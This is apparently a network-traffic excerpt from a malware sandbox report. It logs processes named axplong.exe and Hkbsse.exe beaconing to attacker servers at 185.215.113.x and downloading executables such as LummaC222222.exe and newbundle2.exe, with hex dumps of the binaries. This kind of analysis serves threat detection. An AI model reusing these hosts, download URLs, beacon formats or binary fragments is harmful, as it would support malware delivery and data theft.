                                                                          22192.168.2.549738185.215.113.16805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:25.859637976 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 31
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 64 31 3d 31 30 30 30 32 39 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                          Data Ascii: d1=1000290001&unit=246122658369
                                                                          Sep 27, 2024 04:21:26.562638044 CEST193INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:26 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 4 <c>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          23192.168.2.549740185.215.113.117805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:26.633996964 CEST61OUTGET /inc/LummaC222222.exe HTTP/1.1
                                                                          Host: 185.215.113.117
                                                                          Sep 27, 2024 04:21:27.329622030 CEST1236INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:27 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 360448
                                                                          Last-Modified: Mon, 23 Sep 2024 14:42:37 GMT
                                                                          Connection: keep-alive
                                                                          ETag: "66f17e5d-58000"
                                                                          Accept-Ranges: bytes
                                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 3c 94 ed 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 aa 04 00 00 d2 00 00 00 00 00 00 c0 d3 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 06 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8a e5 04 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 d0 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac e6 [TRUNCATED]
                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<f@@@xH.text `.rdata)*@@.dataX^@.relocHJ6@B
                                                                          Sep 27, 2024 04:21:27.329636097 CEST224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 53 57 56 83 e4 f8 81 ec 68 02 00 00 8b 45 18 89 44 24 28 8b 45 14 8b 7d
                                                                          Data Ascii: USWVhED$(E}D$LG@t$,tud)0Cu(
                                                                          Sep 27, 2024 04:21:27.329653025 CEST1236INData Raw: c2 f7 d2 8d b0 ff fe fe fe 21 d6 f7 c6 80 80 80 80 75 18 83 7d 08 00 74 be 83 f9 04 7d b9 90 90 90 90 90 90 90 90 90 3c 25 74 55 84 c0 8b 74 24 2c 0f 84 6f 27 00 00 83 7d 08 00 0f 84 46 ff ff ff 89 fa f7 d2 21 f2 89 f1 f7 d1 21 f9 29 d1 81 f9 ff
                                                                          Data Ascii: !u}t}<%tUt$,o'}F!!),L$LQuVUW'1)AAP?w[$dDAAA@AuAAu
                                                                          Sep 27, 2024 04:21:27.329663992 CEST1236INData Raw: 54 24 18 89 f3 89 f1 90 90 90 90 90 90 90 90 90 90 90 90 8b 74 24 0c 80 7c 32 ff 30 0f 85 f5 09 00 00 4e 8d 41 ff 89 74 24 0c 83 fe 02 0f 82 e6 09 00 00 83 f9 01 89 c1 75 d9 e9 da 09 00 00 88 44 24 45 b0 01 89 44 24 04 89 d1 81 f1 00 00 f0 ff 89
                                                                          Data Ascii: T$t$|20NAt$uD$ED$!\$uT$L$0gD$$$|$tD$$T$0D$D$$H;L$vT$JD$$
                                                                          Sep 27, 2024 04:21:27.329679012 CEST1236INData Raw: 85 c9 74 04 89 44 24 0c 8b 5c 24 04 8b 44 24 0c e9 8e 11 00 00 88 94 24 63 02 00 00 c7 44 24 24 01 00 00 00 c6 44 24 44 00 c6 44 24 38 00 c7 44 24 40 00 00 00 00 c7 44 24 10 00 00 00 00 8d 9c 24 63 02 00 00 c7 44 24 1c 00 00 00 00 c7 44 24 0c 00
                                                                          Data Ascii: tD$\$D$$cD$$D$DD$8D$@D$$cD$D$1D$4n\$L$(L$($cD$$D$DD$8D$@D$$cD$(D$(T$(L$L)T$(y2[D$PY
                                                                          Sep 27, 2024 04:21:27.329689980 CEST1236INData Raw: 45 20 c1 0f b6 c1 01 c6 8d 1c 34 83 c3 64 8d 86 00 fe ff ff f7 d8 89 44 24 24 81 fe 00 02 00 00 75 12 c6 43 ff 30 4b c7 44 24 24 01 00 00 00 b8 01 00 00 00 83 7c 24 14 00 7f 08 c7 44 24 14 00 00 00 00 c7 44 24 0c 00 00 00 00 89 c1 81 e1 00 00 00
                                                                          Data Ascii: E 4dD$$uC0KD$$|$D$D$5HD$T$D$(L$L$$L$@|#9)L$D$\$L$9~IL$\$D$rD$\$$|$
                                                                          Sep 27, 2024 04:21:27.329700947 CEST1236INData Raw: 77 42 dd e2 df e0 9e 76 0b d9 ca dd e1 df e0 9e d9 ca 77 30 dc fa 8d 8b 00 00 00 03 81 fb ff ff ff 00 77 20 dd e2 df e0 9e 0f 86 18 14 00 00 d9 ca dd e1 dd d9 df e0 9e d9 ee d9 c9 d9 ca 0f 86 03 14 00 00 dd d8 dd d8 89 cb b9 06 00 00 00 8b 44 24
                                                                          Data Ascii: wBvw0w D$t\$D$XD$D$|$L$$L$L$0T$<t5)D$8D$D-x u+tD$DD$EL$@p\$uD$\$7D
                                                                          Sep 27, 2024 04:21:27.329714060 CEST1236INData Raw: 8b 54 24 08 29 f2 83 e2 fc 8b 44 24 14 01 d0 01 d8 83 c0 04 89 ce 29 d6 89 f2 29 da 83 c2 fc eb 2f c7 44 24 0c 00 00 00 00 e9 4d 01 00 00 8b 5c 24 1c 85 c0 0f 85 39 02 00 00 e9 fc fe ff ff 89 c1 89 c3 e9 df 02 00 00 89 c6 8b 44 24 20 89 f2 85 d2
                                                                          Data Ascii: T$)D$))/D$M\$9D$ \$t-Rj0PD$,T$L$T$ T$9t$$;L$~t$+t$t$$t$T$T$9|L$t71\$ST$0F9uL$
                                                                          Sep 27, 2024 04:21:27.329725981 CEST1236INData Raw: 89 ce e8 a8 9e 00 00 8b 54 24 14 83 c4 0c 01 f7 89 de 8b 5c 24 1c 83 7d 08 00 0f 84 0f ff ff ff 89 f8 29 f0 3d ff 01 00 00 0f 8c 00 ff ff ff 01 44 24 4c 50 ff 75 0c 56 ff 55 08 83 c4 0c 85 c0 0f 84 8b 0a 00 00 89 c7 89 c6 8b 54 24 08 e9 dc fe ff
                                                                          Data Ascii: T$\$})=D$LPuVUT$L$4D$DL$EL$D$D )9|}u(D$Dt$,1t$NL$B9u)t$,\$rPL$
                                                                          Sep 27, 2024 04:21:27.329739094 CEST1236INData Raw: 89 f8 29 f0 3d ff 01 00 00 0f 8c 10 ff ff ff 01 44 24 4c 50 ff 75 0c 56 ff 55 08 83 c4 0c 85 c0 0f 85 f5 fe ff ff e9 d2 05 00 00 89 c1 83 f8 04 0f 83 75 ff ff ff eb be 89 74 24 2c 8b 74 24 24 85 f6 0f 85 67 02 00 00 8b 4c 24 0c 85 c9 8b 74 24 2c
                                                                          Data Ascii: )=D$LPuVUut$,t$$gL$t$,OD$9D$D$8}t)9|(L$8t$,1t$^\$B9u)t$,\$rRD$P
                                                                          Sep 27, 2024 04:21:27.334589958 CEST1236INData Raw: e3 03 8d 70 ff 39 f3 72 02 89 f3 8d 43 01 50 6a 20 57 e8 f0 94 00 00 83 c4 0c 01 df 47 29 de 8b 5c 24 1c 83 fe 04 7d 16 eb 48 90 90 90 90 90 90 90 90 90 90 90 90 90 89 de 83 fe 04 7c 34 89 f0 83 fe 07 7c 05 b8 07 00 00 00 f7 d8 8d 1c 06 83 c3 03
                                                                          Data Ascii: p9rCPj WG)\$}H|4|CPj W)\$tVj Wt$,D$P}%!!)JD$LPuVUtYD$ED$D$P@


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          24192.168.2.549741185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:26.877104998 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:27.591264963 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:27 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:27.999865055 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:28.237636089 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:28 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          25192.168.2.549742185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:28.448106050 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:29.179043055 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:29 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:29.180299997 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:29.419514894 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:29 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          26192.168.2.549744185.215.113.16805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:28.761652946 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 31
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 64 31 3d 31 30 30 30 33 31 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                          Data Ascii: d1=1000314001&unit=246122658369
                                                                          Sep 27, 2024 04:21:29.464981079 CEST193INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:29 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 4 <c>0
                                                                          Sep 27, 2024 04:21:29.466773987 CEST58OUTGET /inc/newbundle2.exe HTTP/1.1
                                                                          Host: 185.215.113.16
                                                                          Sep 27, 2024 04:21:29.687958002 CEST1236INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:29 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 311296
                                                                          Last-Modified: Sun, 22 Sep 2024 20:59:29 GMT
                                                                          Connection: keep-alive
                                                                          ETag: "66f08531-4c000"
                                                                          Accept-Ranges: bytes
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 80 b6 e6 ea 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 ec 02 00 00 d0 01 00 00 00 00 00 d6 b9 02 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 b9 02 00 4f 00 00 00 00 20 03 00 c4 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 68 b9 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0 @ @O h H.text `.rsrc @@.reloc@B
                                                                          Sep 27, 2024 04:21:29.687968969 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 b9 02 00 00 00 00 00 48 00 00 00 02 00 05 00 54 2d 01 00 1c 80 01 00 03 00 00
                                                                          Data Ascii: HT-Mp01s,~%-&~ls-%(+o/8o0%rprYp~1(2
                                                                          Sep 27, 2024 04:21:29.687979937 CEST1236INData Raw: 0a 7e d7 02 00 04 25 2d 17 26 7e ce 02 00 04 fe 06 74 03 00 06 73 4f 00 00 0a 25 80 d7 02 00 04 28 06 00 00 2b 6f 65 01 00 06 00 11 07 11 06 fe 06 68 03 00 06 73 50 00 00 0a 7e d8 02 00 04 25 2d 17 26 7e ce 02 00 04 fe 06 75 03 00 06 73 51 00 00
                                                                          Data Ascii: ~%-&~tsO%(+oehsP~%-&~usQ%(+ogisR~%-&~vsS%(+ok(+,dsm%o_%rp(>oa%sUoc%oi%ok%sV
                                                                          Sep 27, 2024 04:21:29.688070059 CEST672INData Raw: 11 07 11 07 6f 8c 01 00 06 28 4b 00 00 0a 2d 09 11 07 6f 8c 01 00 06 2b 05 72 fd 02 00 70 6f 8d 01 00 06 00 11 07 11 07 6f 8e 01 00 06 28 4b 00 00 0a 2d 09 11 07 6f 8e 01 00 06 2b 05 72 fd 02 00 70 6f 8f 01 00 06 00 11 07 11 07 6f 90 01 00 06 28
                                                                          Data Ascii: o(K-o+rpoo(K-o+rpoo(K-o+rpoorp(b,ocXo:+*AdzJzR
                                                                          Sep 27, 2024 04:21:29.688081980 CEST1236INData Raw: 00 00 de 06 13 0a 00 00 de 00 11 07 2d 03 14 2b 07 11 07 28 81 01 00 06 28 4b 00 00 0a 16 fe 01 13 0b 11 0b 2c 09 06 11 07 6f 68 00 00 0a 00 00 11 06 17 58 13 06 11 06 11 05 6f 12 01 00 06 fe 04 13 0c 11 0c 3a a9 fe ff ff 00 de 05 26 00 00 de 00
                                                                          Data Ascii: -+((K,ohXo:&+*AL`m-0sV%(`sa(\(],A
                                                                          Sep 27, 2024 04:21:29.688095093 CEST1236INData Raw: 00 00 2b 28 0c 00 00 2b 13 07 11 07 11 05 11 06 28 8c 00 00 06 0a 00 2b 10 00 02 16 14 28 14 00 00 06 6f 5e 00 00 0a 0a 00 00 de 06 13 08 00 00 de 00 06 13 09 2b 00 11 09 2a 00 01 10 00 00 00 00 07 00 ce d5 00 06 1a 00 00 01 1b 30 05 00 89 01 00
                                                                          Data Ascii: +(+(+(o^+*0~1~1%rpoCiY(+(+8,Erp(v%s(`sa(\(],8X8,8
                                                                          Sep 27, 2024 04:21:29.688106060 CEST1236INData Raw: 06 0a 00 00 02 6f 86 00 00 0a 6f 88 00 00 0a 0b 38 ca 00 00 00 07 6f 89 00 00 0a 74 23 00 00 01 0c 00 08 6f 8a 00 00 0a 72 e3 03 00 70 28 8b 00 00 0a 0d 09 2c 0d 06 08 6f 8c 00 00 0a 6f 8d 01 00 06 00 08 6f 8a 00 00 0a 72 ed 03 00 70 28 8b 00 00
                                                                          Data Ascii: oo8ot#orp(,ooorp(,orpo(oorp(,ooorp(,/(}ooooop(qoroo[:+u$
                                                                          Sep 27, 2024 04:21:29.688116074 CEST1236INData Raw: 06 6f 5e 00 00 0a 6f 7a 01 00 06 00 25 08 11 05 1f 09 6f 18 01 00 06 16 6f 3a 00 00 0a 1f 31 fe 01 6f 7c 01 00 06 00 25 08 11 05 18 6f 18 01 00 06 6f 5e 00 00 0a 6f 80 01 00 06 00 25 08 11 05 19 6f 18 01 00 06 6f 82 01 00 06 00 13 06 00 de 05 26
                                                                          Data Ascii: o^oz%oo:1o|%oo^o%oo&,ohXo:%&+*A4J{0~~1%{(`s
                                                                          Sep 27, 2024 04:21:29.688127041 CEST328INData Raw: 08 11 07 6f 5a 00 00 0a 00 dc 00 00 11 04 17 58 13 04 11 04 1a fe 04 13 17 11 17 3a a0 fd ff ff 00 de 05 26 00 00 de 00 06 0d 2b 00 09 2a 00 41 4c 00 00 00 00 00 00 1a 01 00 00 82 01 00 00 9c 02 00 00 05 00 00 00 13 00 00 01 02 00 00 00 f1 00 00
                                                                          Data Ascii: oZX:&+*AL"(*0%(`sarp~1(2(mon((}or>&oo~%-
                                                                          Sep 27, 2024 04:21:29.688678980 CEST1236INData Raw: 02 8e 16 fe 01 2b 01 17 0a 06 2c 05 00 14 0b de 4f 02 04 03 28 9d 00 00 0a 0b de 44 0c 00 28 7d 00 00 0a 02 6f 72 00 00 0a 6f 6f 00 00 0a 7e dc 02 00 04 25 2d 17 26 7e da 02 00 04 fe 06 7a 03 00 06 73 9b 00 00 0a 25 80 dc 02 00 04 28 10 00 00 2b
                                                                          Data Ascii: +,O(D(}oroo~%-&~zs%(+,* !D03s(ono(rp~1o2+*0~18o_c_,
                                                                          Sep 27, 2024 04:21:29.688921928 CEST1236INData Raw: 0a 06 17 58 0b 2b 10 00 07 20 01 01 00 00 5a 0b 07 02 06 91 61 0b 00 06 17 59 25 0a 16 fe 04 16 fe 01 13 04 11 04 2d df 07 0d 2b 00 09 2a 00 13 30 02 00 1e 00 00 00 1b 00 00 11 00 02 14 fe 03 0a 06 2c 0f 00 02 6f ab 00 00 0a 74 1e 00 00 1b 0b 2b
                                                                          Data Ascii: X+ ZaY%-+*0,ot++*0,ot++*&(*zddd*dX%dX%dX%*0b


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          27192.168.2.549746185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:29.563450098 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:30.288439035 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:30 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:30.643394947 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:30.882782936 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:30 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          28192.168.2.549748185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:30.996032953 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:31.721355915 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:31 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:31.765674114 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:32.221024036 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:32 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          29192.168.2.549749185.215.113.16805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:31.329678059 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 31
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 64 31 3d 31 30 30 30 33 32 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                          Data Ascii: d1=1000322001&unit=246122658369
                                                                          Sep 27, 2024 04:21:32.022234917 CEST193INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:31 GMT
                                                                          Content-Type: text/html; charset=UTF-8
